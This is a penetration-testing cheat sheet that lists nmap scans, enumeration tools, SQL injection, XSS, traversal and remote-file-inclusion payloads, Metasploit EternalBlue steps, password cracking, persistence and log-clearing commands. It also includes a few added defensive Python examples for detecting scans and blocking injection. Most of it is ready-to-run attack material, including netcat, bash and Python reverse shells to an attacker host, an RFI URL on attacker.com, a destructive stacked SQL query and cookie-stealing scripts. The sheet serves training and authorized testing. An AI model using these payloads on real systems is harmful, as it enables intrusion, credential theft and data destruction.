🔍 NMAP Scan Types
nmap [options] <target>
SYN (Stealth): nmap -sS <target>
TCP Connect: nmap -sT <target>
UDP Scan: nmap -sU -p 53,161 <target>
FIN Scan: nmap -sF <target>
Ping Sweep: nmap -sn 192.168.1.0/24
OS Detection: nmap -O <target>
Version Detect: nmap -sV <target>
All Scripts: nmap -sC <target>
Aggressive: nmap -A <target>
All Ports: nmap -p- <target>
Specific Ports: nmap -p 22,80,443 <target>
Timing (-T)
T0 Paranoid
T1 Sneaky
T2 Polite
T3 Normal
T4 Aggressive
T5 Insane
Port Response States
Open: SYN-ACK received
Closed: RST received
Filtered: No response / ICMP unreachable
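The three response states above are also what a defender sees from the other side: one source touching many ports of one host in seconds, most answering RST or nothing, is the signature of a SYN sweep. The following is an added example (not part of the cheat sheet) that classifies each probe reply with the same state table and flags sources that fit that pattern. The log format is an assumption made for the example, and the log lines are constructed.

```python
"""Flag likely SYN scans in connection-attempt logs (added example, constructed data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed line shape (not a real product's format):
# "<ISO-timestamp> SYN <src-ip> -> <dst-ip>:<dst-port> <reply>"
# <reply> mirrors the state table: SYN-ACK = open, RST = closed, NONE = filtered.
SAMPLE_LOG = """\
2024-05-01T10:00:00 SYN 10.0.0.5 -> 10.0.0.20:22 SYN-ACK
2024-05-01T10:00:00 SYN 10.0.0.5 -> 10.0.0.20:23 RST
2024-05-01T10:00:01 SYN 10.0.0.5 -> 10.0.0.20:25 RST
2024-05-01T10:00:01 SYN 10.0.0.5 -> 10.0.0.20:80 SYN-ACK
2024-05-01T10:00:01 SYN 10.0.0.5 -> 10.0.0.20:135 NONE
2024-05-01T10:00:02 SYN 10.0.0.5 -> 10.0.0.20:139 RST
2024-05-01T10:00:02 SYN 10.0.0.5 -> 10.0.0.20:443 SYN-ACK
2024-05-01T10:00:02 SYN 10.0.0.5 -> 10.0.0.20:445 RST
2024-05-01T10:00:03 SYN 10.0.0.5 -> 10.0.0.20:3306 RST
2024-05-01T10:00:03 SYN 10.0.0.5 -> 10.0.0.20:3389 NONE
2024-05-01T10:00:03 SYN 10.0.0.5 -> 10.0.0.20:8080 RST
2024-05-01T10:00:04 SYN 10.0.0.5 -> 10.0.0.20:8443 RST
2024-05-01T10:05:00 SYN 10.0.0.7 -> 10.0.0.20:443 SYN-ACK
2024-05-01T10:06:00 SYN 10.0.0.7 -> 10.0.0.20:443 SYN-ACK
"""

STATE_BY_REPLY = {"SYN-ACK": "open", "RST": "closed", "NONE": "filtered"}


def parse_line(line):
    """Split one constructed log line into its fields and map the reply to a port state."""
    ts, _, src, _, dst, reply = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst_ip,
            "port": int(dst_port), "state": STATE_BY_REPLY[reply]}


def find_scanners(log_text, min_ports=10, window=timedelta(seconds=60), min_not_open=0.5):
    """Return {src: summary} for sources that probed at least `min_ports` distinct ports
    of one host inside `window`, where at least `min_not_open` of the probes got RST or
    no reply. A normal client seldom hits many closed/filtered ports; a sweep does."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e)

    hits = {}
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):           # sliding time window over sorted probes
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            ports = {e["port"] for e in win}
            if len(ports) < min_ports:
                continue
            not_open = sum(1 for e in win if e["state"] != "open")
            if not_open / len(win) < min_not_open:
                continue
            # keep the widest qualifying window seen for this source
            if src not in hits or len(ports) > hits[src]["ports"]:
                hits[src] = {
                    "target": dst,
                    "ports": len(ports),
                    "open": sorted({e["port"] for e in win if e["state"] == "open"}),
                    "filtered": sorted({e["port"] for e in win if e["state"] == "filtered"}),
                }
    return hits


if __name__ == "__main__":
    for src, info in find_scanners(SAMPLE_LOG).items():
        print(f"possible SYN scan from {src}: {info}")
```

The thresholds (10 ports, 60 seconds, half of the probes not open) are starting points; a T0/T1 scan spreads probes over minutes, so widen the window when hunting for slow scans.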
📋 NMAP Enumeration Scripts (NSE)
SMB / Windows
nmap --script smb-enum-users.nse -p445 <host>
nmap --script smb-enum-groups.nse -p445 <host>
nmap --script smb-enum-shares.nse -p445 <host>
nmap --script smb-enum-processes.nse \
--script-args smbusername=<u>,smbpass=<p> -p445 <host>
Web
nmap -sV --script=http-enum <target>
SNMP
nmap -sU -p161 --script=snmp-info <target>
nmap -sU -p161 --script=snmp-brute <target>
SMTP Open Relay
nmap -p25 --script=smtp-open-relay <target>
Vuln Scan Combo
nmap -sV -sC -O -p- -T4 <target>
Other Enum Tools
enum4linux: enum4linux -a <target>
smbclient: smbclient -L //<target>
Nikto (web): nikto -h <target>
gobuster: gobuster dir -u <url> -w <wordlist>
ffuf: ffuf -u <url>/FUZZ -w <wordlist>
🌐 DNS & Passive Recon
nslookup: nslookup <domain>
dig any: dig <domain> any
dig MX: dig <domain> mx
dig reverse: dig -x <IP>
whois: whois <domain>
DNSrecon: dnsrecon -d <domain>
theHarvester: theHarvester -d <domain> -b all
h8mail: pip3 install h8mail → h8mail -t <email>
Recon-ng Key Commands
recon-ng
marketplace search <keyword>
marketplace install <module>
modules load <module>
options set SOURCE <domain>
run
Google Dorks
filetype: filetype:xls "passwords"
inurl: inurl:admin login
intitle: intitle:"Index of /etc"
Sessions leak: intext:JSESSIONID inurl:access.log
Shodan: shodan search <query>
💉 SQL Injection
Basic Tests — put in any input field
'
"
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin'--
' OR 1=1--
1 OR 1=1
Smith' or '1'='1
UNION-Based
1 UNION SELECT null,null,null--
1 UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data--
omar' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --
Blind / Boolean
1 AND 1=1 → true (data shown)
1 AND 1=2 → false (blank/error)
' AND SUBSTRING(username,1,1)='a'--
Time-Delay (Blind)
MySQL: ' AND SLEEP(5)--
id=8 AND IF(version() like '8%',sleep(10),'false'))--
MSSQL: '; WAITFOR DELAY '0:0:5'--
Postgres: '; SELECT pg_sleep(5)--
Stacked Queries
1; DELETE FROM customers
1; INSERT INTO users(username) VALUES ('omar')
URL Injection
?id=99 AND 1=2 (false)
?id=99 AND 1=1 (true)
?id=1234' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --
DB Fingerprint (concat test)
MySQL: 'finger' + 'printing'
MSSQL: 'finger' 'printing'
Oracle/PG: 'finger'||'printing'
Categories
In-band
Blind/Inferential
Out-of-band
Boolean
Time-delay
Stacked
UNION
Error-based
SQLmap: sqlmap -u "<url>" --dbs
🔌 Key Ports
21: FTP
22: SSH
23: Telnet
25: SMTP
53: DNS
80: HTTP
110: POP3
135: MS-RPC
137-139: NetBIOS
143: IMAP
161/UDP: SNMP
443: HTTPS
445: SMB
465: SMTPS
587: SSMTP
993: IMAPS
995: POP3S
3306: MySQL
3389: RDP
5355/UDP: LLMNR
⚡ XSS Payloads
Basic Test
<script>alert("XSS")</script>
javascript:alert(document.cookie)
<script>alert(document.cookie)</script>
Img Tag
<img src=javascript:alert('xss')>
<img src="x" onerror="alert('xss')">
Event Handlers
<a onmouseover="alert(document.cookie)">click</a>
<body onload=alert('xss')>
Types
Reflected (non-persist)
Stored (persistent)
DOM-based
🔐 Auth & Session Attacks
Session Fingerprint IDs
PHP: PHPSESSID
Java/J2EE: JSESSIONID
ASP.NET: ASP.NET_SessionId
ColdFusion: CFID / CFTOKEN
Pass-the-Hash
- Windows stores passwords as NTLM hashes in SAM
- Use captured hash directly to auth (skip cracking)
- Tools: Mimikatz, Metasploit
Password Tools
hashcat dict: hashcat -m 0 hash.txt wordlist
john dict: john --wordlist=rockyou.txt hash
john brute: john --incremental hash
CSRF Attack Pattern
http://target/csrf/?password_new=NEWPASS
&password_conf=NEWPASS&Change=Change#
📁 Path Traversal / File Inclusion
Directory Traversal
?page=../../../../../etc/passwd
?page=../../etc/shadow
URL Encoded Variants
../%2e%2e%2f
../%2e%2e/
../..%2f
..\%2e%2e%5c
LFI (Local File Inclusion)
?file=../etc/passwd
?lang=../../../../etc/passwd%00
RFI (Remote File Inclusion)
?page=http://attacker.com/malware.html
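The traversal, encoded-variant, LFI and RFI inputs listed above are defeated by one server-side check: fully decode the value, reject NUL bytes and remote URLs, then resolve the path and refuse anything that lands outside the document root. The following is an added example (not from the cheat sheet) that applies that check to the page's own inputs; the document root `/srv/app/pages` is an assumption, and POSIX path rules are used regardless of host OS so the result is deterministic.

```python
"""Safe file-path resolution against the traversal inputs above (added example)."""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/app/pages"   # assumed document root for the example


def normalise_request_path(raw):
    """Percent-decode until stable (catches double encoding such as %252e),
    reject NUL bytes (the %00 truncation trick), and treat backslashes as slashes."""
    decoded = raw
    for _ in range(3):                      # bounded: stop once decoding changes nothing
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    return decoded.replace("\\", "/")


def resolve_under_root(raw, root=WEB_ROOT):
    """Return the absolute file path for `raw`, or raise ValueError if it escapes `root`."""
    rel = normalise_request_path(raw)
    if "://" in rel:                        # RFI shape: includes are never fetched remotely
        raise ValueError("remote include rejected")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, rel.lstrip("/")))
    # normpath has already collapsed every ../ so a simple prefix test is sound
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise ValueError("path escapes document root")
    return candidate


def is_safe(raw):
    """Convenience predicate for the checks above."""
    try:
        resolve_under_root(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for value in ["about.html", "../../../../../etc/passwd", "../%2e%2e%2f",
                  "..\\%2e%2e%5c", "../../../../etc/passwd%00",
                  "http://attacker.com/malware.html"]:
        print(f"{value!r:40} -> {'ok' if is_safe(value) else 'REJECTED'}")
```

Resolving against the real filesystem (realpath) is the stronger form when symlinks exist under the root; the string-based version here is enough to show why every encoded variant on the page collapses to the same rejected path.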
🎯 Metasploit Framework
msfconsole
search <term>
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST <target-ip>
set LHOST <your-ip>
exploit (or run)
EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target>
set LHOST <attacker>
exploit
Meterpreter Commands
List procs: ps
Dump hashes: hashdump
Shell: shell
Upload file: upload /path/file
Download file: download /path/file
Network info: ipconfig
Who am I: getuid
Clear logs: clearev
Migrate proc: migrate <PID>
Webcam snap: webcam_snap
Search files: search -f *.txt
Search Exploits CLI
searchsploit smb
searchsploit <CVE-XXXX-XXXX>
🐚 Netcat & Shells
Bind Shell (victim listens)
# On VICTIM — open listener + shell
nc -lvp 1234 -e /bin/bash
# On ATTACKER — connect to victim
nc -nv <victim-ip> 1234
Reverse Shell (attacker listens)
# On ATTACKER — open listener
nc -lvp 666
# On VICTIM — connect back to attacker
nc <attacker-ip> 666 -e /bin/bash
Other Netcat Uses
Port scan: nc -z <ip> 20-1000
Banner grab: nc -nv <ip> 80
Send file: nc -nv <ip> 1234 < file.txt
Recv file: nc -lvp 1234 > out.txt
Python Reverse Shell
python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect(("ATTACKER",666));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"])'
Bash Reverse Shell
bash -i >& /dev/tcp/ATTACKER/666 0>&1
🌩 Network Attacks
LLMNR/NBT-NS Poisoning
- Tool: Responder
- Spoof name resolution on LAN
- Capture NTLMv2 hashes
- Crack offline → plain passwords
ARP Poisoning / MITM
- Tool: Ettercap, ARPspoof
- Spoof MAC → intercept L2 traffic
- ARP cache = IP→MAC table poisoned
DNS Cache Poisoning
- Inject bad DNS records
- Victim → attacker's IP instead of real
SMTP Commands (user enum)
telnet <mailserver> 25
HELO test
VRFY omar
EXPN admins
SNMP Attack
Walk: snmp-check <target>
Default creds: public / private
Brute NSE: --script snmp-brute
FTP Anonymous
ftp <target>
Username: anonymous
Password: (blank or email)
DoS Types
Direct
Reflected
Amplification
Botnet DDoS
🏴 Post-Exploitation & Persistence
Persistence Methods
- Bind / Reverse shells
- Scheduled tasks (Windows)
- Custom daemons / services
- Add new user accounts
- Backdoors + rootkits
- SSH tunnels / port forwarding
Lateral Movement
- Network scanning post-exploit
- SMB share enumeration
- Pass-the-hash attacks
- RDP / VNC access
- Credential dumping → reuse
Cover Tracks
- Delete created user accounts
- Remove uploaded files & tools
- Remove backdoors & daemons
- Clear logs:
clearev (meterp)
- Restore modified configs
Steganography (steghide)
sudo apt install steghide
# Hide data in image:
steghide embed -cf image.png -sf secret.txt
# Extract:
steghide extract -sf image.png
Priv Escalation Types
Vertical (low→admin)
Horizontal (user→user)
🔟 OWASP Top 10 & Misc Web Attacks
OWASP 2025 Categories
Injection
Broken Auth
SSRF
Cryptographic Failures
Insecure Design
Security Misconfiguration
Vulnerable Components
Integrity Failures
Logging Failures
Broken Access Control
IDOR (Insecure Direct Object Ref)
?customerID=1188 → change to 1189
?user=omar → change to admin
HTTP Parameter Pollution
?search=cars&results=20&search=bikes
(same param twice with diff value)
HTTP Methods
GET / POST
PUT / DELETE
OPTIONS / TRACE
Command Injection
192.168.1.1; cat /etc/passwd
192.168.1.1 | whoami
192.168.1.1 && id
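Each of the three inputs above works only because the host value is handed to a shell as part of a command string. The following added example (not from the cheat sheet) shows the hardened form: parse the value as an IP address and pass an argument list to the process without a shell, so `;`, `|` and `&&` are never interpreted. The ping wrapper is an assumed application function, not a real tool's API.

```python
"""Hardened host-check: typed validation plus shell-free execution (added example)."""
import ipaddress
import subprocess


def build_ping_argv(user_host):
    """Return the argv list for a one-packet ping, or raise ValueError.
    Parsing as an IP address means '192.168.1.1; cat /etc/passwd' is rejected outright;
    and because the result is a list (no shell=True), metacharacters would be inert anyway."""
    try:
        ip = ipaddress.ip_address(user_host.strip())
    except ValueError:
        raise ValueError(f"not an IP address: {user_host!r}") from None
    return ["ping", "-c", "1", str(ip)]


def ping(user_host, timeout=5):
    """Run the ping without a shell; returns the process exit status (0 = reachable)."""
    argv = build_ping_argv(user_host)
    return subprocess.run(argv, capture_output=True, timeout=timeout).returncode


def is_injection_attempt(user_host):
    """True when the value would have been rejected; useful as a log/alert signal."""
    try:
        build_ping_argv(user_host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for value in ["192.168.1.1", "192.168.1.1; cat /etc/passwd",
                  "192.168.1.1 | whoami", "192.168.1.1 && id"]:
        print(f"{value!r:35} -> {'rejected' if is_injection_attempt(value) else 'accepted'}")
```

Logging rejected values is worth doing: a burst of `is_injection_attempt` hits from one client is a cheap detection signal for the probing shown above.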
CSRF Attack URL
http://target/changepass?
password_new=hack&password_conf=hack
&Change=Change#
HTTP Status Ranges
1xxInformational
2xxSuccess
3xxRedirect
4xxClient Error
5xxServer Error
Web Proxy Tools
Burp Suite
OWASP ZAP
Wireshark
📐 Methodology & Pentest Phases
Pentest Phases (EC-Council)
1. Reconnaissance (passive/active)
2. Scanning & Enumeration
3. Gaining Access (exploitation)
4. Maintaining Access (persistence)
5. Covering Tracks
6. Reporting ← always!
Test Types
Black Box: No prior knowledge
White Box: Full info (diagrams, creds)
Gray Box: Limited info (some creds)
CTF: Speed, get flags fast
Key Legal Documents
SOW (Statement of Work)
NDA (Non-Disclosure)
SLA (Service Level Agr.)
Rules of Engagement
Scope Definition
Vulnerability Scan Types
Unauthenticated
Authenticated
Discovery
Full
Stealth
Compliance
Scoring Standards
CVE: CVE-YYYY-NNNN
CVSS: Score 0–10 (base/temp/env)
CWE: Weakness taxonomy
Metasploit: module exists = HIGH severity rule
🎭 Social Engineering
Attack Types
- Phishing / Spear phishing
- Whaling (targets execs)
- Vishing (voice phishing)
- SMS Phishing (smishing)
- Watering hole attack
- Malicious USB drops
- Pharming (DNS redirect)
Physical
- Tailgating (no consent)
- Piggybacking (with consent)
- Shoulder surfing
- Dumpster diving
- Badge cloning
Influence Methods
Authority
Fear
Urgency
Likeness
Scarcity
Social Proof
Tools
SET: setoolkit → clone sites
BeEF: XSS-based browser hook
⚡ Quick Reference
Kali One-liners
# Ping sweep
nmap -sn 192.168.1.0/24
# All ports, version, default scripts
nmap -sV -sC -p- <target>
# Aggressive
nmap -A -T4 <target>
# Vuln scripts
nmap --script vuln <target>
# FTP anon check
nmap --script ftp-anon <target>
# SMB vuln check
nmap --script smb-vuln* <target>
# Nikto scan
nikto -h http://<target>
# Gobuster
gobuster dir -u http://<target> \
-w /usr/share/wordlists/dirb/common.txt
SQLmap Quick
sqlmap -u "http://site.com/page?id=1" --dbs
sqlmap -u "url" -D <db> --tables
sqlmap -u "url" -D <db> -T <table> --dump
📝 Pentest Report Structure
Required Sections
- Executive Summary
- Scope Details
- Methodology used
- Findings (with CVSS scores)
- Remediation guidance
- Conclusion & Summary
- Appendix + Glossary
Remediation Controls
Technical (MFA, patching)
Administrative (policies)
Operational (training)
Physical (CCTV, mantraps)
Post-Engagement
- Remove all test artifacts
- Restore original configs
- Delete test credentials
- Client sign-off / acceptance
- Destroy client sensitive data
🚫 Nikto Not Available? Do It Manually
1. Directory Enumeration
gobuster dir -u http://<target> \
-w /usr/share/wordlists/dirb/common.txt
ffuf -u http://<target>/FUZZ \
-w /usr/share/wordlists/dirb/common.txt
2. Version & Header Detection
nmap -sV -p 80,443 <target>
nmap -sV --script=http-headers <target>
# Grab the Server header:
curl -I http://<target>
# Verbose headers:
curl -v http://<target>
3. Check HTTP Methods
nmap --script http-methods <target>
curl -X OPTIONS http://<target> -v
4. Known Paths Manually
curl http://<target>/admin
curl http://<target>/backup
curl http://<target>/config.php
curl http://<target>/.htaccess
⭐ Always First!
curl http://<target>/robots.txt
curl http://<target>/sitemap.xml
robots.txt often lists precisely the sensitive directories they don't want shown; perfect for recon!
Combo = Nikto Replacement
nmap -sV
gobuster
curl -I
robots.txt
http-methods
💀 John The Ripper (Linux Cracking)
1. Combine Passwd & Shadow
Needed to merge user info and hashes:
unshadow <passwd> <shadow> > combined.txt
2. Crack with John (RockYou)
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt
3. View Cracked Passwords
john --show combined.txt
Extra Formats & Tips
Windows NTLM: john --format=NT hash.txt
MD5 crypt: john --format=md5crypt hash.txt
Unzip RockYou: sudo gunzip /usr/share/wordlists/rockyou.txt.gz
🐳 Docker & Pivoting
Find Container IP
Crucial for network reconnaissance:
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_id>
SSH & Tunneling
Priv key auth: ssh -i <key> user@ip
Port forward: ssh -L <lport>:<rip>:<rport> user@ip
Shell in container: docker exec -it <id> /bin/bash
🦈 Wireshark Analysis
Filters for Credentials
HTTP POST: http.request.method == POST
FTP user/pass: ftp
Telnet plaintext: telnet
Follow session: tcp.stream eq 0
Finding Credentials
Follow TCP Stream → look for USER/PASS or form data
Export Files
File → Export Objects → HTTP/FTP
💉 SQL Injection Pro Tips
Manual Enumeration
' ORDER BY 1-- (count columns)
' UNION SELECT NULL,NULL-- (match columns)
DB Versions
MySQL/MSSQL: @@version
Oracle: SELECT banner FROM v$version
Hydra Brute Force
hydra -l admin -P rockyou.txt ftp://<IP>
hydra -l admin -P rockyou.txt ssh://<IP>
ETHICAL HACKING — COMPLETE CHEAT SHEET (eth + eth2 + eth3) — FOR AUTHORIZED TESTING ONLY